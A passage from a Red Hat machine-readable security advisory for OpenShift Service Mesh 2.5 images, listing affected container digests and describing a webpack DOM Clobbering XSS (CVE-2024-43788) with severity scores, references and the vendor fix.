"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: Brotli decompressor infinite loop"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
